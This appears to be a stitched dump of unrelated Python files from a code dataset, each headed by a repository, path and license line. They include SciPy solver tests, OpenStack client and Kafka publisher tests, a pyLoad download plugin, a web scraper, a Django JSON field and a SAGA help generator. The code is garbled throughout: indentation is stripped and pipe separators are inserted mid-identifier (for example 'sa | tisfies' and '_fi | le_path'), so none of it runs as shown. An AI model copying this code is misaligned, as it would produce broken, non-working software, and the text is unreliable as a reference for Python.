for func in SOLVERS:
if func in f.KNOWN_BAD:
if func in MUST_WORK:
yield self._check_func_fail, f, func
continue
yield self._check_func, f, func
class TestSecant(TestCase):
"""Check that some Jacobian approximations satisfy the secant condition"""
xs = [np.array([1,2,3,4,5], float),
np.array([2,3,4,5,1], float),
np.array([3,4,5,1,2], float),
np.array([4,5,1,2,3], float),
np.array([9,1,9,1,3], float),
np.array([0,1,9,1,3], float),
np.array([5,5,7,1,1], float),
np.array([1,2,7,5,1], float),]
fs = [x**2 - 1 for x in xs]
def _check_secant(self, jac_cls, npoints=1, **kw):
"""
Check that the given Jacobian approximation sa | tisfies secant
co | nditions for last `npoints` points.
"""
jac = jac_cls(**kw)
jac.setup(self.xs[0], self.fs[0], None)
for j, (x, f) in enumerate(zip(self.xs[1:], self.fs[1:])):
jac.update(x, f)
for k in xrange(min(npoints, j+1)):
dx = self.xs[j-k+1] - self.xs[j-k]
df = self.fs[j-k+1] - self.fs[j-k]
assert_(np.allclose(dx, jac.solve(df)))
# Check that the `npoints` secant bound is strict
if j >= npoints:
dx = self.xs[j-npoints+1] - self.xs[j-npoints]
df = self.fs[j-npoints+1] - self.fs[j-npoints]
assert_(not np.allclose(dx, jac.solve(df)))
def test_broyden1(self):
self._check_secant(nonlin.BroydenFirst)
def test_broyden2(self):
self._check_secant(nonlin.BroydenSecond)
def test_broyden1_update(self):
# Check that BroydenFirst update works as for a dense matrix
jac = nonlin.BroydenFirst(alpha=0.1)
jac.setup(self.xs[0], self.fs[0], None)
B = np.identity(5) * (-1/0.1)
for last_j, (x, f) in enumerate(zip(self.xs[1:], self.fs[1:])):
df = f - self.fs[last_j]
dx = x - self.xs[last_j]
B += (df - dot(B, dx))[:,None] * dx[None,:] / dot(dx, dx)
jac.update(x, f)
assert_(np.allclose(jac.todense(), B, rtol=1e-10, atol=1e-13))
def test_broyden2_update(self):
# Check that BroydenSecond update works as for a dense matrix
jac = nonlin.BroydenSecond(alpha=0.1)
jac.setup(self.xs[0], self.fs[0], None)
H = np.identity(5) * (-0.1)
for last_j, (x, f) in enumerate(zip(self.xs[1:], self.fs[1:])):
df = f - self.fs[last_j]
dx = x - self.xs[last_j]
H += (dx - dot(H, df))[:,None] * df[None,:] / dot(df, df)
jac.update(x, f)
assert_(np.allclose(jac.todense(), inv(H), rtol=1e-10, atol=1e-13))
def test_anderson(self):
# Anderson mixing (with w0=0) satisfies secant conditions
# for the last M iterates, see [Ey]_
#
# .. [Ey] V. Eyert, J. Comp. Phys., 124, 271 (1996).
self._check_secant(nonlin.Anderson, M=3, w0=0, npoints=3)
class TestLinear(TestCase):
"""Solve a linear equation;
some methods find the exact solution in a finite number of steps"""
def _check(self, jac, N, maxiter, complex=False, **kw):
np.random.seed(123)
A = np.random.randn(N, N)
if complex:
A = A + 1j*np.random.randn(N, N)
b = np.random.randn(N)
if complex:
b = b + 1j*np.random.randn(N)
def func(x):
return dot(A, x) - b
sol = nonlin.nonlin_solve(func, b*0, jac, maxiter=maxiter,
f_tol=1e-6, line_search=None, verbose=0)
assert_(np.allclose(dot(A, sol), b, atol=1e-6))
def test_broyden1(self):
# Broyden methods solve linear systems exactly in 2*N steps
self._check(nonlin.BroydenFirst(alpha=1.0), 20, 41, False)
self._check(nonlin.BroydenFirst(alpha=1.0), 20, 41, True)
def test_broyden2(self):
# Broyden methods solve linear systems exactly in 2*N steps
self._check(nonlin.BroydenSecond(alpha=1.0), 20, 41, False)
self._check(nonlin.BroydenSecond(alpha=1.0), 20, 41, True)
def test_anderson(self):
# Anderson is rather similar to Broyden, if given enough storage space
self._check(nonlin.Anderson(M=50, alpha=1.0), 20, 29, False)
self._check(nonlin.Anderson(M=50, alpha=1.0), 20, 29, True)
def test_krylov(self):
# Krylov methods solve linear systems exactly in N inner steps
self._check(nonlin.KrylovJacobian, 20, 2, False, inner_m=10)
self._check(nonlin.KrylovJacobian, 20, 2, True, inner_m=10)
class TestJacobianDotSolve(object):
"""Check that solve/dot methods in Jacobian approximations are consistent"""
def _func(self, x):
return x**2 - 1 + np.dot(self.A, x)
def _check_dot(self, jac_cls, complex=False, tol=1e-6, **kw):
np.random.seed(123)
N = 7
def rand(*a):
q = np.random.rand(*a)
if complex:
q = q + 1j*np.random.rand(*a)
return q
def assert_close(a, b, msg):
d = abs(a - b).max()
f = tol + abs(b).max()*tol
if d > f:
raise AssertionError('%s: err %g' % (msg, d))
self.A = rand(N, N)
# initialize
x0 = np.random.rand(N)
|
noironetworks/python-group-based-policy-client | gbpclient/tests/unit/test_cli20_natpool.py | Python | apache-2.0 | 4,756 | 0 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import logging
import sys
from gbpclient.gbp.v2_0 import groupbasedpolicy as gbp
from gbpclient.tests.unit import test_cli20
class CLITestV20NatPoolJSON(test_cli20.CLITestV20Base):
LOG = logging.getLogger(__name__)
def setUp(self):
super(CLITestV20NatPoolJSON, self).setUp()
def test_create_nat_pool_with_mandatory_params(self):
"""nat-pool-create with all mandatory params."""
resource = 'nat_pool'
cmd = gbp.CreateNatPool(test_cli20.MyApp(sys.stdout), None)
name = 'my-name'
tenant_id = 'my-tenant'
my_id = 'my-id'
args = ['--tenant-id', tenant_id,
name]
position_names = ['name', ]
position_values = [name, ]
self._test_create_resource(resource, cmd, name, my_id, args,
position_names, position_values,
tenant_id=tenant_id)
def test_create_nat_pool_with_all_params(self):
"""nat-pool-create with all params."""
resource = 'nat_pool'
cmd = gbp.CreateNatPool(test_cli20.MyApp(sys.stdout), None)
name = 'myname'
tenant_id = 'mytenant'
description = 'My Nat Pool'
my_id = 'someid'
ip_version = '4'
ip_pool = '192.168.0.0/24'
external_segment_id = "segmentid"
shared = 'true'
args = ['--tenant-id', tenant_id,
'--description', description,
'--ip-version', ip_version,
'--ip-pool', ip_pool,
'--external-segment', external_segment_id,
'--shared', shared,
name]
position_names = ['name', ]
position_values = [name, ]
self._test_create_resource(resource, cmd, name, my_id, args,
position_names, position_values,
tenant_id=tenant_id,
description=description,
ip_version=4,
ip_pool=ip_pool,
external_segment_id=external_segment_id,
shared=shared)
def test_list_nat_pools(self):
"""nat-pool-list."""
resource = 'nat_pools'
cmd = gbp.ListNatPool(test_cli20.MyApp(sys.stdout), None)
self._test_list_resources(resource, cmd, True)
def test_show_nat_pool_name(self | ):
"""nat-pool-show."""
resource = 'nat_pool'
cmd = | gbp.ShowNatPool(test_cli20.MyApp(sys.stdout), None)
args = ['--fields', 'id', self.test_id]
self._test_show_resource(resource, cmd, self.test_id, args, ['id'])
def test_update_nat_pool(self):
"nat-pool-update myid --name myname --tags a b."
resource = 'nat_pool'
cmd = gbp.UpdateNatPool(test_cli20.MyApp(sys.stdout), None)
self._test_update_resource(resource, cmd, 'myid',
['myid', '--name', 'myname',
'--tags', 'a', 'b'],
{'name': 'myname', 'tags': ['a', 'b'], })
def test_update_nat_pool_with_all_params(self):
resource = 'nat_pool'
cmd = gbp.UpdateNatPool(test_cli20.MyApp(sys.stdout), None)
name = 'myname'
description = 'My Nat Pool'
my_id = 'someid'
external_segment_id = "segmentid"
shared = 'true'
args = ['--name', name,
'--description', description,
'--external-segment', external_segment_id,
'--shared', shared,
my_id]
params = {
'name': name,
'description': description,
'external_segment_id': external_segment_id,
'shared': shared
}
self._test_update_resource(resource, cmd, my_id, args, params)
def test_delete_nat_pool_name(self):
"""nat-pool-delete."""
resource = 'nat_pool'
cmd = gbp.DeleteNatPool(test_cli20.MyApp(sys.stdout), None)
my_id = 'my-id'
args = [my_id]
self._test_delete_resource(resource, cmd, my_id, args)
|
erikmhauck/Bagster | gui/elements/__init__.py | Python | mit | 112 | 0 | from file_view_handler import FileHandler
from metadata_table import Metad | ataTable
from row_ite | m import RowItem
|
joberreiter/pyload | module/plugins/hoster/YourfilesTo.py | Python | gpl-3.0 | 2,040 | 0.006373 | # -*- coding: utf-8 -*-
import re
import urllib
from module.plugins.internal.Hoster import Hoster
class YourfilesTo(Hoster):
__name__ = "YourfilesTo"
__type__ = "hoster"
__version__ = "0.24"
__status__ = "testing"
__pattern__ = r'http://(?:www\.)?yourfiles\.(to|biz)/\? | d=\w+'
__description__ = """Youfiles.to hoster plugin"""
__license__ = "GPLv3"
__authors__ = [("jeix", "jeix@hasnomail.de"),
("skydancer", "skydancer@hasnomail.de")]
def process(self, pyfile):
self.pyfile = pyfile
self.prepare()
self.download(self.get_file_url())
def prepare(self):
if not self.file_exists():
self.offline()
| self.pyfile.name = self.get_file_name()
self.wait(self.get_waiting_time())
def get_waiting_time(self):
if not self.html:
self.download_html()
#: var zzipitime = 15
m = re.search(r'var zzipitime = (\d+);', self.html)
if m is not None:
sec = int(m.group(1))
else:
sec = 0
return sec
def download_html(self):
url = self.pyfile.url
self.html = self.load(url)
def get_file_url(self):
"""
Returns the absolute downloadable filepath
"""
url = re.search(r"var bla = '(.*?)';", self.html)
if url:
url = url.group(1)
url = urllib.unquote(url.replace("http://http:/http://", "http://").replace("dumdidum", ""))
return url
else:
self.error(_("Absolute filepath not found"))
def get_file_name(self):
if not self.html:
self.download_html()
return re.search("<title>(.*)</title>", self.html).group(1)
def file_exists(self):
"""
Returns True or False
"""
if not self.html:
self.download_html()
if re.search(r"HTTP Status 404", self.html):
return False
else:
return True
|
holvi/python-stdnum | getmybp.py | Python | lgpl-2.1 | 3,036 | 0.001647 | #!/usr/bin/env python
# getmybp.py - script to donwnload data from Malaysian government site
#
# Copyright (C) 2013-2016 Arthur de Jong
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in t | he hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHA | NTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
from collections import defaultdict
import re
import urllib
import BeautifulSoup
# URLs that are downloaded
state_list_url = 'http://www.jpn.gov.my/informasi/kod-negeri/'
country_list_url = 'http://www.jpn.gov.my/en/informasi/kod-negara/'
spaces_re = re.compile('\s+', re.UNICODE)
def clean(s):
"""Cleans up the string removing unneeded stuff from it."""
return spaces_re.sub(' ', s.replace(u'\u0096', '')).strip().encode('utf-8')
def parse(f):
"""Parse the specified file."""
soup = BeautifulSoup.BeautifulSoup(f, convertEntities='html')
# find all table rows
for tr in soup.find('div', {'class': 'box-content'}).findAll('tr'):
# find the rows with four columns of text
tds = [
clean(''.join(x.string for x in td.findAll(text=True)))
for td in tr.findAll('td')
]
if len(tds) >= 2 and tds[0] and tds[1]:
yield tds[0], tds[1]
if len(tds) >= 4 and tds[2] and tds[3]:
yield tds[2], tds[3]
if __name__ == '__main__':
results = defaultdict(lambda : defaultdict(set))
# read the states
#f = open('/tmp/states.html', 'r')
f = urllib.urlopen(state_list_url)
for state, bps in parse(f):
for bp in bps.split(','):
results[bp.strip()]['state'] = state
results[bp.strip()]['countries'].add('Malaysia')
# read the countries
#f = open('/tmp/countries.html', 'r')
f = urllib.urlopen(country_list_url)
for country, bp in parse(f):
results[bp]['countries'].add(country)
# print the results
print '# generated from National Registration Department of Malaysia, downloaded from'
print '# %s' % state_list_url
print '# %s' % country_list_url
print
for bp in sorted(results.iterkeys()):
res = bp
row = results[bp]
if 'state' in row:
res += ' state="%s"' % row['state']
countries = list(row['countries'])
countries.sort()
if len(countries) == 1:
res += ' country="%s"' % countries[0]
if len(countries) > 0:
res += ' countries="%s"' % (', '.join(countries))
print res
|
vbabiy/gedit-openfiles | gedit_openfiles/configuration.py | Python | gpl-2.0 | 1,698 | 0.002356 | from logger import log
import os
import gconf
import urllib
class Configuration(object):
def __init__(self):
self._config = {}
self._file_path = os.path.join(os.path.dirname(__file__), 'config',
'config.ini')
# Read Files
self._read_file()
def get_value(self, key):
if key in self._config:
log.debug("[Config] Getting Value for %s" % key)
value = self._config[key]
if value == "True":
return True
elif value == "False":
return False
return value
else:
return None |
def set_value(self, key, value):
self._config[key] = value
self._write_file()
def _write_file(self):
f = file(self._file_path, "wb")
config_list = [("%s=%s\n" % (key, value)) for key,
value in self._config.iteritems()]
f.writelines(config_list)
f.close()
def _read_file(self):
f = file(self._fi | le_path, "rb")
file_list = f.readlines()
f.close()
self._config = {} # reset config
for line in file_list:
line = line.strip()
if len(line) > 0:
name, value = line.split("=")
value = value.strip()
value = value.replace("[", "")
value = value.replace("]", "")
value = value.replace("'", "")
if value.find(",") > -1:
self.set_value(name, [v.strip() for v in value.split(',')])
else:
self.set_value(name, value)
log.info("[Config] Config Map = %s", self._config)
|
jrutila/django-reportengine | reportengine/jsonfield.py | Python | bsd-3-clause | 5,953 | 0.003192 | """
Django JSON Field. This extends Django Model Fields to store JSON as a field-type.
"""
#TODO - Move this to utils or another application. This is tangential to reporting and useful for other things.
from django.db import models
try:
import json as simplejson
except ImportError:
from django.utils import simplejson
from django.core.serializers.json import DjangoJSONEncoder
import logging
class JSONFieldDescriptor(object):
def __init__(self, field, datatype=dict):
"""
Create a JSONFieldDescriptor
:param field: The field to create the descriptor for.
:param datatype: The datatype of the descriptor.
"""
self.field = field
self.datatype = datatype
def __get__(self, instance=None, owner=None):
if instance is None:
raise AttributeError(
"The '%s' attribute can only be accessed from %s instances."
% (self.field.name, owner.__name__))
if not hasattr(instance, self.field.get_cache_name()):
data = instance.__dict__.get(self.field.attname, self.datatype())
if not isinstance(data, self.datatype):
data = self.field.loads(data)
if data is None:
data = self.datatype()
setattr(instance, self.field.get_cache_name(), data)
return getattr(instance, self.field.get_cache_name())
def __set__(self, instance, value):
if not isinstance(value, (self.datatype, basestring)):
value = self.datatype(value)
instance.__dict__[self.field.attname] = value
try:
delattr(instance, self.field.get_cache_name())
except AttributeError:
pass
class JSONField(models.TextField):
"""
A field for storing JSON-encoded data. The data is accessible as standard
Python data types and is transparently encoded/decoded to/from a JSON
string in the database.
"""
serialize_to_string = True
descriptor_class = JSONFieldDescriptor
def __init__(self, verbose_name=None, name=None,
encoder=DjangoJSONEncoder(), decoder=simplejson.JSONDecoder(),
datatype=dict,
**kwargs):
"""
Create a new JSONField
:param verbose_name: The verbose name of the field
:param name: The short name of the field.
:param encoder: The encoder used to turn native datatypes into JSON.
:param decoder: The decoder used to turn JSON into native datatypes.
:param datatype: The native datatype to store.
:param kwargs: Other arguments to pass to parent constructor.
"""
blank = kwargs.pop('blank', True)
models.TextField.__init__(self, verbose_name, name, blank=blank,
**kwargs)
self.encoder = encoder
self.decoder = decoder
self.datatype = datatype
#TODO - Is this used anywhere? If not, let's remove it.
def db_type(self, connection=None):
"""
Returns the database type. Overrides django.db.models.Field's db_type.
:param connection: The database connection - defaults to none.
:return: The database type. Always returns the string 'text'.
"""
return "text"
def contribute_to_class(self, cls, name):
"""
Overrides django.db.models.Field's contribute to class to handle descriptors.
:param cls: The class to contribute to.
:param name: The name.
"""
super(JSONField, self).contribute_to_class(cls, name)
setattr(cls, self.name, self.descriptor_class(self, self.datatype))
def pre_save(self, model_instance, add):
"Returns field's value just before saving. If a descriptor, get's that instead of value from object."
descriptor = getattr(model_instance, self.attname)
if isinstance(descriptor, self.datatype):
return descriptor
return self.field.value_from_object(model_instance)
def get_db_prep_save(self, value, *args, **kwargs):
if not isinstance(value, basestring):
value = self.dumps(value)
return super(JSONField, self).get_db_prep_save(value, *args, **kwargs)
def value_to_string(self, obj):
"""
Turns the value to a JSON string.
:param obj: An object.
:return: A string.
"""
return self.dumps(self.value_from_object(obj))
def dumps(self, data):
"""
Encodes data and dumps.
:param data: A value.
:return: An encoded string.
"""
return self.encoder.encode(data)
def loads(self, val):
"""
:param val: A JSON encoddd string.
:return: A dict with data from val
"""
try:
val = self.decoder.decode(val)#, encoding=settings.DEFAULT_CHARSET)
# XXX We need to investigate why this is happening once we have
# a solid repro case.
if isinstance(val, basestring):
logging.warning("JSONField decode error. Expected dictionary, "
"got string for input '%s'" % val)
# For whatever reason, we may have gotten back
val = self.decoder.decode(val)#, encoding=settings.DEFAULT_CHARSET)
except ValueErro | r:
val = None
return val
def south_field_triple(self):
"""
Returns a suitable description of this field for South."
:r | eturn: A tuple of field_class, args and kwargs from South's introspector.
"""
# We'll just introspect the _actual_ field.
from south.modelsinspector import introspector
field_class = "django.db.models.fields.TextField"
args, kwargs = introspector(self)
# That's our definition!
return (field_class, args, kwargs)
|
erdc-cm/air-water-vv | 2d/hydraulicStructures/sharp_crested_weir/deprecated/sharp_crested_weir_AV_V1/ls_n.py | Python | mit | 1,536 | 0.017578 | from proteus import *
from ls_p import *
if timeDiscretization=='vbdf':
timeIntegration = VBDF
timeOrder=2
stepController = Min_dt_cfl_controller
elif timeDiscretization=='flcbdf':
timeIntegration = FLCBDF
#stepController = FLCBDF_controller
stepController = Min_dt_cfl_controller
time_tol = 10.0*ls_nl_atol_res
atol_u = {0:time_tol}
rtol_u = {0:time_tol}
else:
timeIntegration = BackwardEuler_cfl
stepController = Min_dt_cfl_controller
femSpaces = {0:basis}
massLumping = False
conservativeFlux = None
numericalFluxType = NCLS.NumericalFlux
subgridError = NCLS.SubgridError(coefficients,nd)
shockCapturing = NCLS.ShockCapturing(coefficients,nd,shockCapturingFactor=ls_shockCapturingFactor,lag=ls_lag_shockCapturing)
fullNewtonFlag = True
multilevelNonlinearSolver = Newton
levelNonlinearSolver = Newton
nonlinearSmoother = None
linearSmo | other = None
matrix = SparseMatrix
if useOldPETSc:
multilevelLinearSolver = PETSc
levelLinearSolver = PETSc
else:
| multilevelLinearSolver = KSP_petsc4py
levelLinearSolver = KSP_petsc4py
if useSuperlu:
multilevelLinearSolver = LU
levelLinearSolver = LU
linear_solver_options_prefix = 'ncls_'
nonlinearSolverConvergenceTest = 'r'
levelNonlinearSolverConvergenceTest = 'r'
linearSolverConvergenceTest = 'r-true'
tolFac = 0.0
nl_atol_res = ls_nl_atol_res
linTolFac = 0.1
l_atol_res = 0.1*ls_nl_atol_res
useEisenstatWalker = False
maxNonlinearIts = 50
maxLineSearches = 0
|
kiith-sa/QGIS | python/plugins/processing/saga/SagaHelpGenerator.py | Python | gpl-2.0 | 7,582 | 0.000528 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
***************************************************************************
SagaHelpGenerator.py
---------------------
Date : August 2012
Copyright : (C) 2012 by Victor Olaya
Email : volayaf at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
import saga_api as saga
class Library:
def __init__(self, filename):
self.sagalib = saga.CSG_Module_Library(saga.CSG_String(str(filename)))
if not self.sagalib.is_Valid():
raise ImportError(filename)
self.libname = filename.split(os.sep)[-1].split(".")[0]
if self.libname.startswith("lib"):
self.libname = self.libname[3:]
self.name = self.sagalib.Get_Name().c_str()
self._modules = None
def modules(self):
if self._modules is not None:
return self._modules
self._modules = list()
for i in range(self.sagalib.Get_Count()):
try:
self._modules.append(Module(self.sagalib, i))
except ImportError:
pass
return self._modules
def __del__(self):
self.sagalib.Destroy()
class Module:
def __init__(self, lib, i):
self.module = lib.Get_Module(i)
if not self.module:
raise ImportError("Module #%i is invalid" % i)
if self.module.is_Interactive():
raise ImportError("Ignoring interactive module")
self.name = self.module.Get_Name()
self.grid = self.module.is_Grid()
if self.module.is_Grid():
self.module = lib.Get_Module_Grid(i)
self.description = self.module.Get_Description()
self.author = self.module.Get_Author()
self._parameters = None
def parameters(self):
if self._parameters is not None:
return self._parameters
params = list()
params.append(self.module.Get_Parameters())
for i in range(self.module.Get_Parameters_Count()):
params.append(self.module.Get_Parameters(i))
self._parameters = list()
for p in params:
for j in range(p.Get_Count()):
try:
self._parameters.append(Parameter(p, j))
except:
pass
return self._parameters
class Parameter:
def __init__(self, params, i):
self.parameter = params.Get_Parameter(i)
self.name = self.parameter.Get_Name()
self.description = self.parameter.Get_Description()
self.typeName = self.parameter.Get_Type_Name()
if self.parameter.is_Output():
self.typeName = "Output " + self.typeName
if self.parameter.is_Input():
self.typeName = "Input " + self.typeName
typ = self.parameter.Get_Type()
self.minimum = None
self.maximum = None
if (typ == saga.PARAMETER_TYPE_Int) or \
(typ == saga.PARAMETER_TYPE_Double) or \
(typ == saga.PARAMETER_TYPE_Degree) or \
(typ == saga.PARAMETER_TYPE_Range):
parameterValue = self.parameter.asValue()
if parameterValue.has_Minimum():
self.minimum = parameterValue.Get_Minimum()
if parameterValue.has_Maximum():
self.maximum = parameterValue.Get_Maximum()
self.choices = None
if typ == saga.PARAMETER_TYPE_Choice:
parameterChoice = self.parameter.asChoice()
self.choices = [parameterCh | oice.Get_Item(i) for i in
range(parameterChoice.Get_Count())]
def getLibraryPaths(userPath=None):
try:
paths = os.environ['MLB_PATH'].split(':')
ex | cept KeyError:
paths = ['/usr/lib/saga/', '/usr/local/lib/saga/']
noMLBpath = True
if userPath:
paths = [userPath] + paths
print "Looking for libraries in " + ', '.join(paths)
for p in paths:
if os.path.exists(p):
return [os.path.join(p, fn) for fn in os.listdir(p)]
if noMLBpath:
print "Warning: MLB_PATH not set."
return []
def qgisizeString(s):
try:
s = str(s)
s = str.replace(s, "Gridd", "Raster")
s = str.replace(s, "Grid", "Raster")
s = str.replace(s, "gridd", "raster")
s = str.replace(s, "grid", "raster")
except:
# Some unicode characters seem to produce exceptions.
# Just ignore those cases.
pass
return s
def writeHTML(path, mod):
docs = unicode()
docs += "<h1 class='module'>%s</h1>\n" % mod.name
docs += "<div class='author'>%s</div>\n" % mod.author
docs += "<div class='description'>%s</div>\n" \
% mod.description.replace('\n', '<br/>\n')
if mod.parameters():
docs += "<h2>Parameters</h2>\n<dl class='parameters'>\n"
for p in mod.parameters():
constraints = list()
if p.minimum:
constraints.append("Minimum: " + str(p.minimum))
if p.maximum:
constraints.append("Maximum: " + str(p.maximum))
if p.choices:
constraints.append("Available choices: "
+ ', '.join(p.choices))
docs += "\t<dt>%s <div class='type'>%s</div></dt>" \
% (p.name, p.typeName)
docs += "<dd>%s <div class='constraints'>%s</div></dd>\n" \
% (p.description, '; '.join(constraints))
docs += "</dl>"
out = open(path, 'w')
out.write('<html>\n<head><link rel="stylesheet" type="text/css" \
href="help.css" /></head>\n<body>\n')
out.write(docs.encode('utf-8'))
out.write('\n</body></html>\n')
out.close()
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser(
description='Generate SAGA documentation in HTML form.')
parser.add_argument('dest', metavar='DESTINATION', type=str,
help='HTML output path.')
parser.add_argument('-l', dest='libpath',
help='Location of SAGA libraries.')
args = parser.parse_args()
libs = list()
paths = getLibraryPaths(args.libpath)
for p in paths:
try:
libs.append(Library(p))
except ImportError:
pass
if not libs:
print "No saga libraries found"
exit(1)
print "%i libraries loaded." % len(libs)
for lib in libs:
mods = lib.modules()
print "%s (%i modules):" % (lib.name, len(mods))
for mod in mods:
path = args.dest + os.sep \
+ mod.name.replace(" ", '').replace("/", '') + ".html"
print '\t', mod.name,
writeHTML(path, mod)
print '\t-> ', path
|
cernops/ceilometer | ceilometer/tests/unit/publisher/test_kafka_broker_publisher.py | Python | apache-2.0 | 8,865 | 0 | #
# Copyright 2015 Cisco Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Tests for ceilometer/publisher/kafka_broker.py
"""
import datetime
import uuid
import mock
from oslo_utils import netutils
from ceilometer.event.storage import models as event
from ceilometer.publisher import kafka_broker as kafka
from ceilometer.publisher import messaging as msg_publisher
from ceilometer import sample
from ceilometer.tests import base as tests_base
@mock.patch('ceilometer.publisher.kafka_broker.LOG', mock.Mock())
@mock.patch('ceilometer.publisher.kafka_broker.kafka.KafkaClient',
mock.Mock())
class TestKafkaPublisher(tests_base.BaseTestCase):
test_event_data = [
event.Event(message_id=uuid.uuid4(),
event_type='event_%d' % i,
generated=datetime.datetime.utcnow(),
traits=[], raw={})
for i in range(0, 5)
]
test_data = [
sample.Sample(
name='test',
type=sample.TYPE_CUMULATIVE,
unit='',
volume=1,
user_id='test',
project_id='test',
resource_id='test_run_tasks',
timestamp=datetime.datetime.utcnow().isoformat(),
resource_metadata={'name': 'TestPublish'},
),
sample.Sample(
name='test',
type=sample.TYPE_CUMULATIVE,
unit='',
volume=1,
user_id='test',
project_id='test',
resource_id='test_run_tasks',
timestamp=datetime.datetime.utcnow().isoformat(),
resource_metadata={'name': 'TestPublish'},
),
sample.Sample(
name='test2',
type=sample.TYPE_CUMULATIVE,
unit='',
volume=1,
user_id='test',
project_id='test',
resource_id='test_run_tasks',
timestamp=datetime.datetime.utcnow().isoformat(),
resource_metadata={'name': 'TestPublish'},
),
sample.Sample(
name='test2',
type=sample.TYPE_CUMULATIVE,
unit='',
volume=1,
user_id='test',
project_id='test',
resource_id='test_run_tasks',
timestamp=datetime.datetime.utcnow().isoformat(),
resource_metadata={'name': 'TestPublish'},
),
sample.Sample(
name='test3',
type=sample.TYPE_CUMULATIVE,
unit='',
volume=1,
user_id='test',
project_id='test',
resource_id='test_run_tasks',
timestamp=datetime.datetime.utcnow().isoformat(),
resource_metadata={'name': 'TestPublish'},
),
]
def test_publish(self):
publisher = kafka.KafkaBrokerPublisher(netutils.urlsplit(
'kafka://127.0.0.1:9092?topic=ceilometer'))
with mock.patch.object(publisher, '_producer') as fake_producer:
publisher.publish_samples(mock.MagicMock(), self.test_data)
self.assertEqual(5, len(fake_producer.send_messages.mock_calls))
self.assertEqual(0, len(publisher.local_queue))
def test_publish_without_options(self):
publisher = kafka.KafkaBrokerPublisher(
netutils.urlsplit('kafka://127.0.0.1:9092'))
with mock.patch.object(publisher, '_producer') as fake_producer:
publisher.publish_samples(mock.MagicMock(), self.test_data)
self.assertEqual(5, len(fake_producer.send_messages.mock_calls))
self.assertEqual(0, len(publisher.local_queue))
def test_publish_to_host_without_policy(self):
publisher = kafka.KafkaBrokerPublisher(netutils.urlsplit(
'kafka://127.0.0.1:9092?topic=ceilometer'))
self.assertEqual('default', publisher.policy)
publisher = kafka.KafkaBrokerPublisher(netutils.urlsplit(
'kafka://127.0.0.1:9092?topic=ceilometer&policy=test'))
self.assertEqual('default', publisher.policy)
def test_publish_to_host_with_default_policy(self):
publisher = kafka.KafkaBrokerPublisher(netutils.urlsplit(
'kafka://127.0.0.1:9092?topic=ceilometer&policy=default'))
with mock.patch.object(publisher, '_producer') as fake_producer:
fake_producer.send_messages.side_effect = TypeError
self.assertRaises(msg_publisher.DeliveryFailure,
publisher.publish_samples,
mock.MagicMock(), self.test_data)
self.assertEqual(100, len(fake_producer.send_messages.mock_calls))
self.assertEqual(0, len(publisher.local_queue))
def test_publish_to_host_with_drop_policy(self):
publisher = kafka.KafkaBrokerPublisher(netutils.urlsplit(
'kafka://127.0.0.1:9092?topic=ceilometer&policy=drop'))
w | ith mock.patch.object(publisher, '_producer') as fake_producer:
fake_producer.send_messages.side_effec | t = Exception("test")
publisher.publish_samples(mock.MagicMock(), self.test_data)
self.assertEqual(1, len(fake_producer.send_messages.mock_calls))
self.assertEqual(0, len(publisher.local_queue))
def test_publish_to_host_with_queue_policy(self):
publisher = kafka.KafkaBrokerPublisher(netutils.urlsplit(
'kafka://127.0.0.1:9092?topic=ceilometer&policy=queue'))
with mock.patch.object(publisher, '_producer') as fake_producer:
fake_producer.send_messages.side_effect = Exception("test")
publisher.publish_samples(mock.MagicMock(), self.test_data)
self.assertEqual(1, len(fake_producer.send_messages.mock_calls))
self.assertEqual(1, len(publisher.local_queue))
def test_publish_to_down_host_with_default_queue_size(self):
publisher = kafka.KafkaBrokerPublisher(netutils.urlsplit(
'kafka://127.0.0.1:9092?topic=ceilometer&policy=queue'))
with mock.patch.object(publisher, '_producer') as fake_producer:
fake_producer.send_messages.side_effect = Exception("test")
for i in range(0, 2000):
for s in self.test_data:
s.name = 'test-%d' % i
publisher.publish_samples(mock.MagicMock(), self.test_data)
self.assertEqual(1024, len(publisher.local_queue))
self.assertEqual('test-976',
publisher.local_queue[0][2][0]['counter_name'])
self.assertEqual('test-1999',
publisher.local_queue[1023][2][0]['counter_name'])
def test_publish_to_host_from_down_to_up_with_queue(self):
publisher = kafka.KafkaBrokerPublisher(netutils.urlsplit(
'kafka://127.0.0.1:9092?topic=ceilometer&policy=queue'))
with mock.patch.object(publisher, '_producer') as fake_producer:
fake_producer.send_messages.side_effect = Exception("test")
for i in range(0, 16):
for s in self.test_data:
s.name = 'test-%d' % i
publisher.publish_samples(mock.MagicMock(), self.test_data)
self.assertEqual(16, len(publisher.local_queue))
fake_producer.send_messages.side_effect = None
for s in self.test_data:
s.name = 'test-%d' % 16
publisher.publish_samples(mock.MagicMock(), self.test_data)
self.assertEqual(0, len(publisher.local_queue))
def test_publish_event_with_default_policy(self):
